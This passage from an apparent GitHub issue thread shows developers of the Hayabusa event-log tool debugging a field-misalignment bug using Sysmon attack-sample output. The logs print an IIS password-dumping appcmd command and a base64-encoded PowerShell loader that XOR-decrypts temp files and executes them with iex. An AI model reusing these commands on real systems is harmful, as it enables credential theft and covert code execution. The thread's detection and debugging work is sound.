    "TerminalSessionId": 0,
    "UtcTime": "2019-05-27 01:29:19.714"
  }
}
```

hitenkoku commented:
@YamatoSecurity I checked with b6f0de629d3155f42734ae3c2274ee59b71ddb34.
We could not confirm the event you indicated. Could you please check again?


```csv
"2019-05-27 10:29:17.270 +09:00","IEWIN7","Sysmon",1,"high",5886,"Microsoft IIS Service Account Password Dumped","Cmdline: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.password ¦ Proc: C:\Windows\System32\inetsrv\appcmd.exe ¦ User: IIS APPPOOL\DefaultAppPool ¦ ParentCmdline: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ¦ LID: 0x82423 ¦ LGUID: 365ABB72-B26B-5CEA-0000-002023240800 ¦ PID: 3240 ¦ PGUID: 365ABB72-3D6D-5CEB-0000-0010D763FF00 ¦ ParentPID: 2584 ¦ ParentPGUID: 365ABB72-3D4A-5CEB-0000-0010FA93FD00 ¦ Description: Application Server Command Line Admin Tool ¦ Product: Internet Information Services ¦ Company: Microsoft Corporation ¦ Hashes: SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45","CommandLine: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.password ¦ CurrentDirectory: C:\Windows\Temp\ ¦ FileVersion: 7.5.7600.16385 (win7_rtm.090713-1255) ¦ IntegrityLevel: High ¦ ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ¦ ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ¦ RuleName: ¦ TerminalSessionId: 0 ¦ UtcTime: 2019-05-27 01:29:17.230"

```

```
{
    "Timestamp": "2019-05-27 10:29:17.270 +09:00",
    "Computer": "IEWIN7",
    "Channel": "Sysmon",
    "EventID": 1,
    "Level": "high",
    "RecordID": 5886,
    "RuleTitle": "Microsoft IIS Service Account Password Dumped",
    "Details": {
        "Cmdline": "\"C:\\Windows\\System32\\inetsrv\\appcmd.exe\"  list apppool \"ERROR ( message:Configuration error \" /text:processmodel.password\"",
        "Proc": "C:\\Windows\\System32\\inetsrv\\appcmd.exe",
        "User": "IIS APPPOOL\\DefaultAppPool",
        "ParentCmdline": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==\"",
        "LID": "0x82423",
        "LGUID": "365ABB72-B26B-5CEA-0000-002023240800",
        "PID": 3240,
        "PGUID": "365ABB72-3D6D-5CEB-0000-0010D763FF00",
        "ParentPID": 2584,
        "ParentPGUID": "365ABB72-3D4A-5CEB-0000-0010FA93FD00",
        "Description": "Application Server Command Line Admin Tool",
        "Product": "Internet Information Services",
        "Company": "Microsoft Corporation",
        "Hashes": "SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45"
    },
    "ExtraFieldInfo": {
        "CurrentDirectory": "C:\\Windows\\Temp\\",
        "FileVersion": "7.5.7600.16385 (win7_rtm.090713-1255)",
        "IntegrityLevel": "High",
        "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "RuleName": "",
        "TerminalSessionId": 0,
        "UtcTime": "2019-05-27 01:29:17.230"
    }
}

```

YamatoSecurity commented:
@hitenkoku Humm, I tried these two commands again but still get the same error:
```
./target/release/hayabusa json-timeline -L -f "../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx" -o test.jsonl -C

cat test.jsonl | jq 'select (.Details.LID == "365ABB72-B26B-5CEA-0000-002023240800")'
```
gives me:
```
  "Details": {
    "Cmdline": "\"C:\\Windows\\System32\\inetsrv\\appcmd.exe\"list vdir \"Line: 0\" /text:password\"",
    "Number": "C:\\Windows\\System32\\inetsrv\\appcmd.exe",
    "Proc": "IIS APPPOOL\\DefaultAppPool",
    "User": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"-nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==\"",
    "ParentCmdline": "0x82423",
    "LID": "365ABB72-B26B-5CEA-0000-002023240800",
    "LGUID": 3844,
    "PID": "365ABB72-3D6F-5CEB-0000-0010F2CFFF00",
    "PGUID": 2584,
    "ParentPID": "365ABB72-3D4A-5CEB-0000-0010FA93FD00",
    "ParentPGUID": "Application Server Command Line Admin Tool",
    "Description": "Internet Information Services",
    "Product": "Microsoft Corporation",
    "Company": "SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45"
  }
```

hitenkoku commented:
Sorry, I checked data. I will fix it.

hitenkoku commented:
@YamatoSecurity  I fixed following parse error in https://github.com/Yamato-Security/hayabusa/pull/1146/commits/6f3690dda489d94582211db3de3731161326a12c . Would you check it?



> @hitenkoku Humm, I tried these two commands again but still get the same error:
> 
> ```
> ./target/release/hayabusa json-timeline -L -f "../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx" -o test.jsonl -C
> 
> cat test.jsonl | jq 'select (.Details.LID == "365ABB72-B26B-5CEA-0000-002023240800")'
> ```
> 
> gives me:
> 
> ```
>   "Details": {
>     "Cmdline": "\"C:\\Windows\\System32\\inetsrv\\appcmd.exe\"list vdir \"Line: 0\" /text:password\"",
>     "Number": "C:\\Windows\\System32\\inetsrv\\appcmd.exe",
>     "Proc": "IIS APPPOOL\\DefaultAppPool",
>     "User": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"-nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==\"",
>     "ParentCmdline": "0x82423",
>     "LID": "365ABB72-B26B-5CEA-0000-002023240800",
>     "LGUID": 3844,
>     "PID": "365ABB72-3D6F-5CEB-0000-0010F2CFFF00",
